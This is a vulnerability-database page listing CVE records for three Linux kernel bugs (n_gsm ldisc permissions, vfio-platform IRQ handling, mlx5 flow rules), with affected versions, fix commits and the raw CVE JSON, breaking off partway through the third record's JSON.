Vulnerability-Lookup

Vendor	Product	Description
Ubuntu	N/A	Ubuntu 22.04 LTS
Ubuntu	N/A	Ubuntu 16.04 ESM
Ubuntu	N/A	Ubuntu 18.04 ESM
Ubuntu	N/A	Ubuntu 24.04 LTS
Ubuntu	N/A	Ubuntu 14.04 ESM
Ubuntu	N/A	Ubuntu 20.04 LTS

CVE-2023-52880 (GCVE-0-2023-52880)

Vulnerability from cvelistv5 – Published: 2024-05-24 15:33 – Updated: 2026-01-05 10:17

Title

tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc

Summary

In the Linux kernel, the following vulnerability has been resolved: tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc Any unprivileged user can attach N_GSM0710 ldisc, but it requires CAP_NET_ADMIN to create a GSM network anyway. Require initial namespace CAP_NET_ADMIN to do that.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7d303dee473ba3529…
	https://git.kernel.org/stable/c/7a529c9023a197ab3…
	https://git.kernel.org/stable/c/ada28eb4b9561aab9…
	https://git.kernel.org/stable/c/2d154a54c58f9c837…
	https://git.kernel.org/stable/c/2b85977977cbd1205…
	https://git.kernel.org/stable/c/67c37756898a5a6b2…

Impacted products

Vendor

Product

Version

Linux

Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 7d303dee473ba3529d75b63491e9963342107bed (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 7a529c9023a197ab3bf09bb95df32a3813f7ba58 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < ada28eb4b9561aab93942f3224a2e41d76fe57fa (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 2b85977977cbd120591b23c2450e90a5806a7167 (git)
Affected: e1eaea46bb4020b38a141b84f88565d4603f8dd0 , < 67c37756898a5a6b2941a13ae7260c89b54e0d88 (git)

Linux

Affected: 2.6.35
Unaffected: 0 , < 2.6.35 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-52880",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-24T19:10:27.057428Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:23:31.686Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T23:18:41.167Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7d303dee473ba3529d75b63491e9963342107bed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7a529c9023a197ab3bf09bb95df32a3813f7ba58"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ada28eb4b9561aab93942f3224a2e41d76fe57fa"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2b85977977cbd120591b23c2450e90a5806a7167"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/67c37756898a5a6b2941a13ae7260c89b54e0d88"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/n_gsm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7d303dee473ba3529d75b63491e9963342107bed",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "7a529c9023a197ab3bf09bb95df32a3813f7ba58",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "ada28eb4b9561aab93942f3224a2e41d76fe57fa",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "2b85977977cbd120591b23c2450e90a5806a7167",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            },
            {
              "lessThan": "67c37756898a5a6b2941a13ae7260c89b54e0d88",
              "status": "affected",
              "version": "e1eaea46bb4020b38a141b84f88565d4603f8dd0",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/tty/n_gsm.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.35"
            },
            {
              "lessThan": "2.6.35",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.6",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6",
                  "versionStartIncluding": "2.6.35",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc\n\nAny unprivileged user can attach N_GSM0710 ldisc, but it requires\nCAP_NET_ADMIN to create a GSM network anyway.\n\nRequire initial namespace CAP_NET_ADMIN to do that."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:17:51.560Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/7d303dee473ba3529d75b63491e9963342107bed"
        },
        {
          "url": "https://git.kernel.org/stable/c/7a529c9023a197ab3bf09bb95df32a3813f7ba58"
        },
        {
          "url": "https://git.kernel.org/stable/c/ada28eb4b9561aab93942f3224a2e41d76fe57fa"
        },
        {
          "url": "https://git.kernel.org/stable/c/2d154a54c58f9c8375bfbea9f7e51ba3bfb2e43a"
        },
        {
          "url": "https://git.kernel.org/stable/c/2b85977977cbd120591b23c2450e90a5806a7167"
        },
        {
          "url": "https://git.kernel.org/stable/c/67c37756898a5a6b2941a13ae7260c89b54e0d88"
        }
      ],
      "title": "tty: n_gsm: require CAP_NET_ADMIN to attach N_GSM0710 ldisc",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52880",
    "datePublished": "2024-05-24T15:33:17.439Z",
    "dateReserved": "2024-05-21T15:35:00.781Z",
    "dateUpdated": "2026-01-05T10:17:51.560Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26813 (GCVE-0-2024-26813)

Vulnerability from cvelistv5 – Published: 2024-04-05 08:24 – Updated: 2025-05-04 08:57

Title

vfio/platform: Create persistent IRQ handlers

Summary

In the Linux kernel, the following vulnerability has been resolved: vfio/platform: Create persistent IRQ handlers The vfio-platform SET_IRQS ioctl currently allows loopback triggering of an interrupt before a signaling eventfd has been configured by the user, which thereby allows a NULL pointer dereference. Rather than register the IRQ relative to a valid trigger, register all IRQs in a disabled state in the device open path. This allows mask operations on the IRQ to nest within the overall enable state governed by a valid eventfd signal. This decouples @masked, protected by the @locked spinlock from @trigger, protected via the @igate mutex. In doing so, it's guaranteed that changes to @trigger cannot race the IRQ handlers because the IRQ handler is synchronously disabled before modifying the trigger, and loopback triggering of the IRQ via ioctl is safe due to serialization with trigger changes via igate. For compatibility, request_irq() failures are maintained to be local to the SET_IRQS ioctl rather than a fatal error in the open device path. This allows, for example, a userspace driver with polling mode support to continue to work regardless of moving the request_irq() call site. This necessarily blocks all SET_IRQS access to the failed index.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/07afdfd8a68f9eea8…
	https://git.kernel.org/stable/c/09452c8fcbd7817c0…
	https://git.kernel.org/stable/c/cc5838f19d39a5fef…
	https://git.kernel.org/stable/c/7932db06c82c5b2f4…
	https://git.kernel.org/stable/c/62d4e43a569b67929…
	https://git.kernel.org/stable/c/d6bedd6acc0bcb1e7…
	https://git.kernel.org/stable/c/0f8d8f9c2173a5418…
	https://git.kernel.org/stable/c/675daf435e9f8e5a5…

Impacted products

Vendor

Product

Version

Linux

Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < 07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < 09452c8fcbd7817c06e8e3212d99b45917e603a5 (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < cc5838f19d39a5fef04c468199699d2a4578be3a (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < 7932db06c82c5b2f42a4d1a849d97dba9ce4a362 (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < 62d4e43a569b67929eb3319780be5359694c8086 (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < d6bedd6acc0bcb1e7e010bc046032e47f08d379f (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < 0f8d8f9c2173a541812dd750529f4a415117eb29 (git)
Affected: 57f972e2b341dd6a73533f9293ec55d584a5d833 , < 675daf435e9f8e5a5eab140a9864dfad6668b375 (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.615Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09452c8fcbd7817c06e8e3212d99b45917e603a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cc5838f19d39a5fef04c468199699d2a4578be3a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7932db06c82c5b2f42a4d1a849d97dba9ce4a362"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/62d4e43a569b67929eb3319780be5359694c8086"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d6bedd6acc0bcb1e7e010bc046032e47f08d379f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0f8d8f9c2173a541812dd750529f4a415117eb29"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/675daf435e9f8e5a5eab140a9864dfad6668b375"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26813",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:50:36.972269Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:44.149Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/platform/vfio_platform_irq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "09452c8fcbd7817c06e8e3212d99b45917e603a5",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "cc5838f19d39a5fef04c468199699d2a4578be3a",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "7932db06c82c5b2f42a4d1a849d97dba9ce4a362",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "62d4e43a569b67929eb3319780be5359694c8086",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "d6bedd6acc0bcb1e7e010bc046032e47f08d379f",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "0f8d8f9c2173a541812dd750529f4a415117eb29",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            },
            {
              "lessThan": "675daf435e9f8e5a5eab140a9864dfad6668b375",
              "status": "affected",
              "version": "57f972e2b341dd6a73533f9293ec55d584a5d833",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/platform/vfio_platform_irq.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/platform: Create persistent IRQ handlers\n\nThe vfio-platform SET_IRQS ioctl currently allows loopback triggering of\nan interrupt before a signaling eventfd has been configured by the user,\nwhich thereby allows a NULL pointer dereference.\n\nRather than register the IRQ relative to a valid trigger, register all\nIRQs in a disabled state in the device open path.  This allows mask\noperations on the IRQ to nest within the overall enable state governed\nby a valid eventfd signal.  This decouples @masked, protected by the\n@locked spinlock from @trigger, protected via the @igate mutex.\n\nIn doing so, it\u0027s guaranteed that changes to @trigger cannot race the\nIRQ handlers because the IRQ handler is synchronously disabled before\nmodifying the trigger, and loopback triggering of the IRQ via ioctl is\nsafe due to serialization with trigger changes via igate.\n\nFor compatibility, request_irq() failures are maintained to be local to\nthe SET_IRQS ioctl rather than a fatal error in the open device path.\nThis allows, for example, a userspace driver with polling mode support\nto continue to work regardless of moving the request_irq() call site.\nThis necessarily blocks all SET_IRQS access to the failed index."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:57:08.928Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/07afdfd8a68f9eea8db0ddc4626c874f29d2ac5e"
        },
        {
          "url": "https://git.kernel.org/stable/c/09452c8fcbd7817c06e8e3212d99b45917e603a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/cc5838f19d39a5fef04c468199699d2a4578be3a"
        },
        {
          "url": "https://git.kernel.org/stable/c/7932db06c82c5b2f42a4d1a849d97dba9ce4a362"
        },
        {
          "url": "https://git.kernel.org/stable/c/62d4e43a569b67929eb3319780be5359694c8086"
        },
        {
          "url": "https://git.kernel.org/stable/c/d6bedd6acc0bcb1e7e010bc046032e47f08d379f"
        },
        {
          "url": "https://git.kernel.org/stable/c/0f8d8f9c2173a541812dd750529f4a415117eb29"
        },
        {
          "url": "https://git.kernel.org/stable/c/675daf435e9f8e5a5eab140a9864dfad6668b375"
        }
      ],
      "title": "vfio/platform: Create persistent IRQ handlers",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26813",
    "datePublished": "2024-04-05T08:24:43.279Z",
    "dateReserved": "2024-02-19T14:20:24.180Z",
    "dateUpdated": "2025-05-04T08:57:08.928Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35960 (GCVE-0-2024-35960)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:41 – Updated: 2025-05-04 09:09

Title

net/mlx5: Properly link new fs rules into the tree

Summary

In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Properly link new fs rules into the tree Previously, add_rule_fg would only add newly created rules from the handle into the tree when they had a refcount of 1. On the other hand, create_flow_handle tries hard to find and reference already existing identical rules instead of creating new ones. These two behaviors can result in a situation where create_flow_handle 1) creates a new rule and references it, then 2) in a subsequent step during the same handle creation references it again, resulting in a rule with a refcount of 2 that is not linked into the tree, will have a NULL parent and root and will result in a crash when the flow group is deleted because del_sw_hw_rule, invoked on rule deletion, assumes node->parent is != NULL. This happened in the wild, due to another bug related to incorrect handling of duplicate pkt_reformat ids, which lead to the code in create_flow_handle incorrectly referencing a just-added rule in the same flow handle, resulting in the problem described above. Full details are at [1]. This patch changes add_rule_fg to add new rules without parents into the tree, properly initializing them and avoiding the crash. This makes it more consistent with how rules are added to an FTE in create_flow_handle.

Severity ?

9.1 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/de0139719cdda8280…
	https://git.kernel.org/stable/c/1263b0b26077b1183…
	https://git.kernel.org/stable/c/3d90ca9145f6b97b3…
	https://git.kernel.org/stable/c/7aaee12b804c5e037…
	https://git.kernel.org/stable/c/2e8dc5cffc844dacf…
	https://git.kernel.org/stable/c/5cf5337ef701830f1…
	https://git.kernel.org/stable/c/adf67a03af39095f0…
	https://git.kernel.org/stable/c/7c6782ad4911cbee8…

Impacted products

Vendor

Product

Version

Linux

Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < de0139719cdda82806a47580ca0df06fc85e0bd2 (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < 1263b0b26077b1183c3c45a0a2479573a351d423 (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < 3d90ca9145f6b97b38d0c2b6b30f6ca6af9c1801 (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < 7aaee12b804c5e0374e7b132b6ec2158ff33dd64 (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < 2e8dc5cffc844dacfa79f056dea88002312f253f (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < 5cf5337ef701830f173b4eec00a4f984adeb57a0 (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < adf67a03af39095f05d82050f15813d6f700159d (git)
Affected: 74491de937125d0c98c9b9c9208b4105717a3caa , < 7c6782ad4911cbee874e85630226ed389ff2e453 (git)

Linux

Affected: 4.10
Unaffected: 0 , < 4.10 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "de0139719cdd",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "3d90ca9145f6",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "7aaee12b804c",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "2e8dc5cffc84",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "5cf5337ef701",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "adf67a03af39",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "7c6782ad4911",
                "status": "affected",
                "version": "74491de93712",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "status": "affected",
                "version": "4.10"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "4.10",
                "status": "unaffected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThanOrEqual": "4.20",
                "status": "unaffected",
                "version": "4.19.313",
                "versionType": "custom"
              }
            ]
          },
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
            ],
